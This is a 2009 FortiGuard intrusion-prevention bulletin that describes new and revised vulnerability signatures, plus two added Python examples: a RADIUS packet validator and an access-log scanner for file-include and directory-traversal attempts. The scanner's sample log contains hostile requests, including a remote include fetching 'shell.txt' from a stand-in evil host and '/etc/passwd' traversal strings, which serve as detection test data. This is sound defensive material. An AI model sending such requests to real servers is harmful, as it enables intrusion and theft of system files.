The FortiGuard Global Threat Research Team has released new security content to cover multiple vulnerabilities. The FortiGuard Team has observed active exploitation of 11 of these vulnerabilities to date.
For more information, visit the FortiGuard Center at www.fortiguardcenter.com.
Fortinet provides coverage for the vulnerabilities described below as of the 2.711 IPS Definitions database update. A brief description of each vulnerability is provided as follows, in order of severity.
Critical ( 9 )
Adobe.RoboHelp.Server.Upload.And.Code.Execution (Event ID: 17720)
Release Date: Nov 05, 2009; IPS Definitions DB Version: 2.711
Description: This indicates an attack attempt against a remote code execution vulnerability in Adobe RoboHelp Server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted HTTP POST request. It allows a remote attacker to upload and execute arbitrary files.
Affected Products: Adobe RoboHelp Server 8
Reference IDs:

Adobe.Shockwave.Player.Code.Execution (Event ID: 17880)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt to exploit a remote code execution vulnerability in Adobe Shockwave Player. The vulnerability results from insecure code in the DLL responsible for parsing DIR files. It can be exploited by a crafted ".dir" file that is opened by the vulnerable software.
Affected Products: Adobe Shockwave Player 10 and prior
Reference IDs:

Adobe.Shockwave.Player.Dir.File.Invalid.Index.Code.Execution (Event ID: 17877)
Release Date: Nov 05, 2009; IPS Definitions DB Version: 2.711
Description: This indicates an attack attempt to exploit a remote code execution vulnerability in Adobe Shockwave Player. The vulnerability results from insecure code in the DLL responsible for parsing DIR files. It can be exploited via a crafted ".dir" file, leading to remote code execution.
Affected Products: Adobe Shockwave Player 10 and prior
Reference IDs:

Adobe.Shockwave.Player.Dir.File.Pointer.Handing.Code.Execution (Event ID: 17876)
Release Date: Nov 05, 2009; IPS Definitions DB Version: 2.711
Description: This indicates an attack attempt to exploit a remote code execution vulnerability in Adobe Shockwave Player. The vulnerability is caused by an error when the vulnerable software handles certain Shockwave content. It allows a remote attacker to execute arbitrary code by tricking a user into visiting a malicious web page.
Affected Products: Adobe Shockwave Player 11.5.1.601 and previous versions
Reference IDs:

Autonomy.KeyView.Module.Excel.File.Buffer.Overflow (Event ID: 17856)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt against a buffer overflow vulnerability in multiple products using the Autonomy KeyView SDK. The vulnerability is caused by an error when the vulnerable software handles a specially crafted Excel file. It allows a remote attacker to execute arbitrary code.
Affected Products:
  Autonomy Keyview Viewer SDK 10.4 and previous versions
  Autonomy Keyview Filter SDK 10.4 and previous versions
  Autonomy Keyview Export SDK 10.4 and previous versions
  IBM Lotus Notes 7.0.3 and previous versions
  Symantec Mail Security for SMTP 5.0.1 Patch 201 and previous versions
  Symantec Data Loss Prevention Endpoint Agents 9.0.1 and previous versions
  Symantec BrightMail Appliance 8.0.1 and previous versions
Reference IDs:

CA.ETrust.PestPatrol.Ppctl.Dll.ActiveX.Access (Event ID: 17847)
Release Date: Nov 02, 2009; IPS Definitions DB Version: 2.708
Description: This indicates an attempt to exploit a code execution vulnerability in CA eTrust PestPatrol. The vulnerability is located in the "ppctl.dll" ActiveX control and is triggered through misuse of the "Initialize" method. It may allow remote attackers to execute arbitrary code on vulnerable systems.
Affected Products: CA eTrust PestPatrol with ppctl.dll (5.6.7.9)
Reference IDs:

Electronic.Arts.SnoopyCtrl.NPSnpy.Dll.ActiveX.Access (Event ID: 17846)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attempt to exploit a code execution vulnerability in Electronic Arts SnoopyCtrl. The vulnerability is located in the "NPSnpy.dll" ActiveX control and is triggered through misuse of the "CheckRequirements" method. It may allow remote attackers to execute arbitrary code on vulnerable systems.
Affected Products: Electronic Arts Inc. SnoopyCtrl ActiveX 0
Reference IDs:

Mozilla.Firefox.NsPropertyTable.PropertyList.Memory.Corruption (Event ID: 17833)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a memory corruption vulnerability in Mozilla Firefox. The vulnerability is caused by an error that occurs when the vulnerable software handles a specially crafted web page. It allows a remote attacker to execute arbitrary code.
Affected Products:
  Mozilla Firefox 3.5.2 and previous versions
  Mozilla Firefox 3.0.13 and previous versions
Reference IDs:

Strawberry.Local.File.Include (Event ID: 17837)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a Local File Include vulnerability in Strawberry. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via a crafted HTTP request.
Affected Products: Strawberry 1.1.1
Reference IDs:

High ( 11 )
ActivePDF.WebGrabber.APWebGrb.Ocx.ActiveX.Access (Event ID: 17848)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attempt to exploit a code execution vulnerability in activePDF WebGrabber. The vulnerability is located in the "APWebGrb.ocx" ActiveX control and is triggered through misuse of the "GetStatus" method. It may allow remote attackers to execute arbitrary code on vulnerable systems.
Affected Products: activePDF WebGrabber 3.8

Apple.Safari.Floating.Point.Parsing.Buffer.Overflow (Event ID: 17675)
Release Date: Oct 27, 2009; IPS Definitions DB Version: 2.706
Description: This indicates an attempt to exploit a buffer overflow vulnerability in Apple Safari (WebKit). The vulnerability is caused by an error that occurs when the vulnerable software parses malicious floating point numbers. It allows a remote attacker to execute arbitrary code via a crafted web page.
Affected Products: Apple Safari versions prior to 4.0.3
Reference IDs:

eEye.Retina.WiFi.Scanner.RWS.Buffer.Overflow (Event ID: 17797)
Release Date: Oct 27, 2009; IPS Definitions DB Version: 2.706
Description: This indicates an attempt to exploit a buffer overflow vulnerability in eEye Retina WiFi Scanner. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious .rws file. It allows a remote attacker to execute arbitrary code by getting a user to open a crafted .rws file.
Affected Products:
  eEye Digital Security Retina WiFi Scanner 1.0.8 68
  eEye Digital Security Retina Network Security Scanner 5.10.14
Reference IDs:

EMC.ApplicationXtender.Activex.Control.Buffer.Overflow (Event ID: 17793)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attempt to exploit a memory corruption vulnerability in EMC software. The vulnerability is located in the "keyhelp.ocx" ActiveX control and is triggered through misuse of the "JumpURL" property. It may allow remote attackers to execute arbitrary code in the context of the application using the affected ActiveX control.
Affected Products:
  EMC Documentum ApplicationXtender Desktop 5.4
  EMC Captiva Quickscan Pro 4.6 SP1
Reference IDs:

McAfee.Remediation.Client.Enginecom.Dll.ActiveX.Access (Event ID: 17849)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attempt to exploit a code execution vulnerability in McAfee Remediation Agent. The vulnerability is located in the "enginecom.dll" ActiveX control and is triggered through misuse of the "DeleteSnapshot" method. It may allow remote attackers to execute arbitrary code on vulnerable systems.
Affected Products: McAfee Remediation Agent 4.5.0.41

Nginx.URL.Processing.Buffer.Overflow (Event ID: 17765)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt against a buffer overflow vulnerability in the nginx HTTP server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted HTTP request. It allows a remote attacker to execute arbitrary code.
Affected Products:
  Igor Sysoev nginx 0.8.14
  Igor Sysoev nginx 0.7.61
  Igor Sysoev nginx 0.6.38
  Igor Sysoev nginx 0.5.37
  Igor Sysoev nginx 0
Reference IDs:

Oracle.Secure.Backup.Authentication.Bypass (Event ID: 17737)
Release Date: Oct 27, 2009; IPS Definitions DB Version: 2.706
Description: This indicates a possible attack against an authentication bypass vulnerability in Oracle Secure Backup. Successful attackers can gain administrative access to the affected application.
Affected Products: Oracle Secure Backup prior to version 10.2.0.3
Reference IDs:

osCommerce.Arbitrary.File.Upload (Event ID: 17845)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attempt to exploit an arbitrary file upload vulnerability in osCommerce. The vulnerability is caused by the vulnerable software accepting file uploads without authentication. It allows a remote attacker to execute arbitrary code via a crafted upload request.
Affected Products: osCommerce Online Merchant 2.2 RC2a
Reference IDs:

QuickTeam.Remote.File.Include (Event ID: 17836)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a Remote File Include vulnerability in QuickTeam. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via a crafted HTTP request.
Affected Products: Qt quickteam 2
Reference IDs:

WordPress.Plugin.Sniplets.File.Include (Event ID: 17834)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a Remote File Include vulnerability in the WordPress plugin Sniplets. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via a crafted HTTP request.
Affected Products: Sniplets 1.1.2 and 1.2.2 plugin for WordPress
Reference IDs:

Zeus.Botnet (Event ID: 17785)
Release Date: Oct 26, 2009; IPS Definitions DB Version: 2.705
Description: This indicates that the system might be infected by the Zeus/ZBot botnet.
Affected Products: Any unprotected Windows system is vulnerable to the attack.

Medium ( 7 )
Adobe.Shockwave.Player.DoS (Event ID: 17879)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt against a denial-of-service vulnerability in Adobe Shockwave Player. The vulnerability is caused by an error when the vulnerable software handles a malicious Shockwave media file. It allows a remote attacker to cause a denial of service via a crafted web page.
Affected Products: Adobe Shockwave Player 11 and prior
Reference IDs:

BarracudaDrive.Web.Server.Directory.Traversal (Event ID: 17742)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt against a directory traversal vulnerability in BarracudaDrive Web Server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted URL. It allows a remote attacker to read arbitrary files.
Affected Products:
  Real Time Logic BarracudaDrive Web Server Home Server 3.7.2
  Real Time Logic BarracudaDrive Web Server 3.7.2
Reference IDs:

cpCommerce.Remote.File.Include (Event ID: 17835)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a Remote File Include vulnerability in cpCommerce. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via a crafted HTTP request.
Affected Products: cpCommerce 1.2.x, possibly including 1.2.9
Reference IDs:

FreeRADIUS.RADIUS.Server.Rad_decode.DoS (Event ID: 17853)
Release Date: Nov 04, 2009; IPS Definitions DB Version: 2.710
Description: This indicates an attack attempt against a denial-of-service vulnerability in the FreeRADIUS RADIUS server. The vulnerability is caused by an error when the vulnerable software handles a specially crafted RADIUS Access-Request packet. It allows a remote attacker to cause a denial-of-service condition.
Affected Products: FreeRADIUS 1.1.7
Reference IDs:

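The bulletin says only that a crafted Access-Request crashes the server's packet decoder; it does not say which attribute is malformed. The class of bug is familiar, though: a RADIUS attribute header carries its own Length octet, and a decoder that trusts that octet can loop forever on Length 0 or read past the datagram on an oversized Length. The following is an added example (not FreeRADIUS code and not a signature from this bulletin) of the checks a rad_decode-style parser has to make before touching attribute values. The packet layout and the per-attribute length bounds come from RFC 2865 and RFC 2868; the sample packets are constructed inline.

```python
import struct

ACCESS_REQUEST = 1
HEADER_LEN = 20
MAX_PACKET_LEN = 4096

# Per-attribute bounds on the attribute Length octet (which counts the Type and
# Length octets themselves), from RFC 2865 / RFC 2868. (min, max); max=None means 255.
ATTR_LEN = {
    1:  (3, None),   # User-Name: at least one octet of text
    2:  (18, 130),   # User-Password: 16..128 octets of value, multiple of 16
    4:  (6, 6),      # NAS-IP-Address: exactly 4 octets of value
    5:  (6, 6),      # NAS-Port: exactly 4 octets of value
    69: (5, None),   # Tunnel-Password: tag + 2-octet salt + string
}


class RadiusError(ValueError):
    """Raised for packets a receiver must silently discard instead of processing."""


def parse_radius(data):
    """Return (code, identifier, authenticator, [(type, value), ...]) or raise RadiusError."""
    if len(data) < HEADER_LEN:
        raise RadiusError("packet shorter than the 20-octet header")
    code, ident, length = struct.unpack("!BBH", data[:4])
    if not HEADER_LEN <= length <= MAX_PACKET_LEN:
        raise RadiusError(f"Length field {length} outside 20..4096")
    if length > len(data):
        raise RadiusError("Length field larger than the datagram")
    authenticator = data[4:HEADER_LEN]
    body = data[HEADER_LEN:length]          # octets beyond Length are padding and ignored
    attrs, off = [], 0
    while off < len(body):
        if len(body) - off < 2:
            raise RadiusError("dangling octet where an attribute header should be")
        atype, alen = body[off], body[off + 1]
        if alen < 2:                        # a Length of 0 or 1 would never advance the cursor
            raise RadiusError(f"attribute {atype}: Length {alen} < 2 would never advance")
        if off + alen > len(body):          # would read past the end of the datagram
            raise RadiusError(f"attribute {atype}: Length {alen} runs past the packet")
        lo, hi = ATTR_LEN.get(atype, (2, None))
        if alen < lo or (hi is not None and alen > hi):
            raise RadiusError(f"attribute {atype}: Length {alen} violates its RFC bounds")
        value = body[off + 2:off + alen]
        if atype == 2 and len(value) % 16:
            raise RadiusError("User-Password is not a multiple of 16 octets")
        attrs.append((atype, value))
        off += alen
    return code, ident, authenticator, attrs


def build_packet(code, ident, authenticator, attrs):
    """Assemble a well-formed packet; used here only to construct sample input."""
    body = b"".join(bytes([t, 2 + len(v)]) + v for t, v in attrs)
    return struct.pack("!BBH", code, ident, HEADER_LEN + len(body)) + authenticator + body


def with_raw_attribute(packet, raw):
    """Append raw attribute octets (possibly malformed) and recompute the header Length."""
    return packet[:2] + struct.pack("!H", len(packet) + len(raw)) + packet[4:] + raw


# Constructed sample packets, not captured traffic. The authenticator is fixed so runs are reproducible.
AUTH = bytes(range(16))
GOOD = build_packet(ACCESS_REQUEST, 7, AUTH,
                    [(1, b"bob"), (4, bytes([192, 0, 2, 1])), (5, struct.pack("!I", 3))])
ZERO_LEN_ATTR = with_raw_attribute(GOOD, bytes([69, 0]))               # Length 0
TRUNCATED_ATTR = with_raw_attribute(GOOD, bytes([69, 40, 1, 0, 0]))    # claims 40 octets, carries 5
UNDERSIZED_ATTR = with_raw_attribute(GOOD, bytes([69, 3, 1]))          # below the RFC 2868 minimum of 5


def check(packet):
    """Return 'ok' or the reason the packet would be discarded."""
    try:
        parse_radius(packet)
        return "ok"
    except RadiusError as e:
        return str(e)


if __name__ == "__main__":
    for name, pkt in [("good", GOOD), ("zero-length", ZERO_LEN_ATTR),
                      ("truncated", TRUNCATED_ATTR), ("undersized", UNDERSIZED_ATTR)]:
        print(f"{name:12s}: {check(pkt)}")
```

The three malformed packets each pass the outer header check (their Length field is consistent with the datagram), so only the per-attribute checks catch them; a decoder that validates the header alone and then walks attributes by their self-declared Length is exactly what this signature class protects.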
Oracle.Database.REPCAT_RPC.VALIDATE_REMOTE_RC.SQL.Injection (Event ID: 17844)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a SQL injection vulnerability in Oracle Database Server. The vulnerability is caused by an input validation error in the function VALIDATE_REMOTE_RC of the package DBMS_REPCAT_RPC. It allows a remote attacker to inject and execute malicious SQL commands on the target server.
Affected Products:
  Oracle Oracle9i Standard Edition 9.2 .8DV
  Oracle Oracle9i Standard Edition 9.2 .8
  Oracle Oracle9i Personal Edition 9.2 .8DV
  Oracle Oracle9i Personal Edition 9.2 .8
  Oracle Oracle9i Enterprise Edition 9.2 .8DV
  Oracle Oracle9i Enterprise Edition 9.2 .8.0
  Oracle Oracle10g Standard Edition 10.2 .3
  Oracle Oracle10g Standard Edition 10.1 .0.5
  Oracle Oracle10g Personal Edition 10.1 .5
  Oracle Oracle10g Personal Edition 10.2.0.4
  Oracle Oracle10g Enterprise Edition 10.2 .3
  Oracle Oracle10g Enterprise Edition 10.1 .5
Reference IDs:

SiteX.Local.File.Include (Event ID: 17839)
Release Date: Oct 29, 2009; IPS Definitions DB Version: 2.707
Description: This indicates an attempt to exploit a Local File Include vulnerability in SiteX. The vulnerability is caused by an error that occurs when the vulnerable software handles a malicious request. It allows a remote attacker to execute arbitrary code via a crafted HTTP request.
Affected Products: SiteX 0.7.4.418 and earlier versions
Reference IDs:

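The file-include signatures above (Strawberry, QuickTeam, the Sniplets WordPress plugin, cpCommerce, SiteX) and the BarracudaDrive directory-traversal signature all fire on the same shape of request: a path or parameter value that climbs out of the web root with ".." segments, or a parameter value that names a remote URL for the application to include. The following is an added example, not a FortiGuard signature and not code from any of the affected projects, of that detection logic run over constructed access-log lines. It percent-decodes repeatedly so double-encoded traversal (%252e%252e) is seen the way the application sees it, and it distinguishes a genuine ".." segment from a filename that merely contains two dots. The log lines, hostnames and parameter names are made up for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Nov/2009:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.11 - - [09/Nov/2009:10:00:02 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512
203.0.113.12 - - [09/Nov/2009:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 512
203.0.113.13 - - [09/Nov/2009:10:00:04 +0000] "GET /..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210
203.0.113.14 - - [09/Nov/2009:10:00:05 +0000] "GET /files/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 200 90
203.0.113.15 - - [09/Nov/2009:10:00:06 +0000] "GET /docs/report..2009.pdf HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes that turn include() of attacker-controlled input into remote code execution.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def decode_fully(s, max_rounds=3):
    """Percent-decode until the string stops changing, so %252e%252e -> %2e%2e -> .. is seen as '..'."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def escapes_root(path):
    """True if the path, walked segment by segment, ever climbs above the web root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(target):
    """Return the list of findings for one request-target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    if "\x00" in path:                       # NUL used to truncate an appended extension
        findings.append("null-byte")
    if escapes_root(path):
        findings.append("directory-traversal")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(value)          # parse_qsl decoded once; undo deeper encoding too
        if value.lower().startswith(REMOTE_SCHEMES):
            findings.append(f"remote-file-include:{name}")
        elif ".." in value.replace("\\", "/").split("/"):
            findings.append(f"local-file-include:{name}")
        if "\x00" in value and "null-byte" not in findings:
            findings.append("null-byte")
    return findings


def scan(log_text):
    """Return (ip, target, findings) for every log line that produces at least one finding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        f = classify(m.group("target"))
        if f:
            hits.append((m.group("ip"), m.group("target"), f))
    return hits


if __name__ == "__main__":
    for ip, target, f in scan(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(f)}")
```

Two caveats a practitioner would want: access logs carry only the request line, so an upload or POST-body include (the RoboHelp and osCommerce entries) is not visible here, and a server that also accepts overlong UTF-8 or other non-percent encodings for "." and "/" needs those normalizations added before the traversal walk.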
Squid.StrListGetItem.DoS (Event ID: 17798)
Release Date: Oct 27, 2009; IPS Definitions DB Version: 2.706
Description: This indicates an attempt to exploit a denial of service vulnerability in Squid. The vulnerability is caused by an error that occurs when the vulnerable software handles a specially crafted HTTP header. It allows a remote attacker to cause a denial of service.
Affected Products: Squid Web Proxy Cache 3.1 5 and previous versions
Reference IDs:

The FortiGuard Threat Research team updates security content as new vectors of exploitation are discovered. The table below details the security content enhanced with this release.
Critical ( 15 )
High ( 10 )
| Event Name | Revision Notes |
|---|---|
| 3ivx.MPEG4.File.Processing.Buffer.Overflow | Detection Enhanced |
| CA.BrightStor.ARCserve.Backup.MediaSVR.EXE.191.Buffer.Overflow | Detection Enhanced (x3); Default_action updated to 'pass' |
| MS.IE.ActiveX.Navigate.Method.Access | Detection Enhanced |
| MS.Windows.X509.OID.Spoofing | Previous name: "MS.Windows.X509.OID.Spool" |
| Playlist.Buffer.Overflow | Detection Enhanced (x2) |
| QuickTeam.Remote.File.Inclusion | Previous name: "QuickTeam.Remote.File.Include" |
| Sun.MySQL.Dispatch.Command.Format.String | Default_action updated to 'drop' |
| Sun.Solaris.DHCP.Client.Remote.Code.Execution | Default_action updated to 'drop' |
| VUPlayer.M3U.Buffer.Overflow | Detection Enhanced |
| WordPress.Plugin.Sniplets.File.Inclusion | Previous name: "WordPress.Plugin.Sniplets.File.Inc... |
Medium ( 10 )
| Event Name | Revision Notes |
|---|---|
| Adobe.Shockwave.Player.Dir.File.Invalid.String.Length.DoS | Previous name: "Adobe.Shockwave.Player.DoS" |
| CA.ARCserve.Backup.Message.Engine.DoS | Default_action updated to 'drop' |
| Coppermine.Photo.Gallery.XSS | Detection Enhanced |
| cpCommerce.Remote.File.Inclusion | Previous name: "cpCommerce.Remote.File.Include" |
| FG-VD-08-022-Apple | Detection Enhanced |
| Mozilla.Firefox.PKCS11.Privilege.Elevation | Detection Enhanced |
| MS.ASP.NET.NumberOfCPUs.Requests.DoS | Detection Enhanced |
| Oracle.BEA.Weblogic.Server.Console-help.Portal.XSS | Default_action updated to 'drop' |
| Oracle.Secure.Enterprise.Search.Linked.XSS | Default_action updated to 'drop' |
| SiteX.Local.File.Inclusion | Previous name: "SiteX.Local.File.Include" |
Low ( 1 )
| Event Name | Revision Notes |
|---|---|
| Apache.IPv6.Buffer.Overflow | Detection Enhanced |
The FortiGuard Threat Research team uses globally distributed probes to monitor exploit activity. A vulnerability is classified as active when exploit attempts are seen on the probes, and is then given a magnitude level reflecting the rate of that activity across the probes. The magnitude is set to low, medium or high.
The table below lists the vulnerabilities discussed in this bulletin (specifically those with new and enhanced detection) and their corresponding exploit activity magnitude. The data is as of this writing.
Critical ( 2 of 14 )
High ( 5 of 16 )
Medium ( 3 of 11 )
| Event Name | Active Exploitation Observed | Magnitude |
|---|---|---|
| Adobe.Shockwave.Player.DoS | No | n/a |
| BarracudaDrive.Web.Server.Directory.Traversal | No | n/a |
| Coppermine.Photo.Gallery.XSS | Yes | Low |
| cpCommerce.Remote.File.Include | No | n/a |
| FG-VD-08-022-Apple | Yes | Medium |
| FreeRADIUS.RADIUS.Server.Rad_decode.DoS | No | n/a |
| Mozilla.Firefox.PKCS11.Privilege.Elevation | No | n/a |
| MS.ASP.NET.NumberOfCPUs.Requests.DoS | Yes | Low |
| Oracle.Database.REPCAT_RPC.VALIDATE_REMOTE_RC.SQL.Injection | No | n/a |
| SiteX.Local.File.Include | No | n/a |
| Squid.StrListGetItem.DoS | No | n/a |
Low ( 1 of 1 )
| Event Name | Active Exploitation Observed | Magnitude |
|---|---|---|
| Apache.IPv6.Buffer.Overflow | Yes | High |
| Revision Date | Version Number | Notes |
|---|---|---|
| Monday, November 09, 2009 | 1 | Initial Documentation. |
About Fortinet ( www.fortinet.com )
Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by enterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and unified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions with integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately held and based in Sunnyvale, California.
Disclaimer
Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. Please note that no Fortinet statements herein constitute or contain any guarantee, warranty or legally binding representation. All materials contained in this publication are subject to change without notice, and Fortinet reserves the right to change, modify, transfer, or otherwise revise this publication without notice.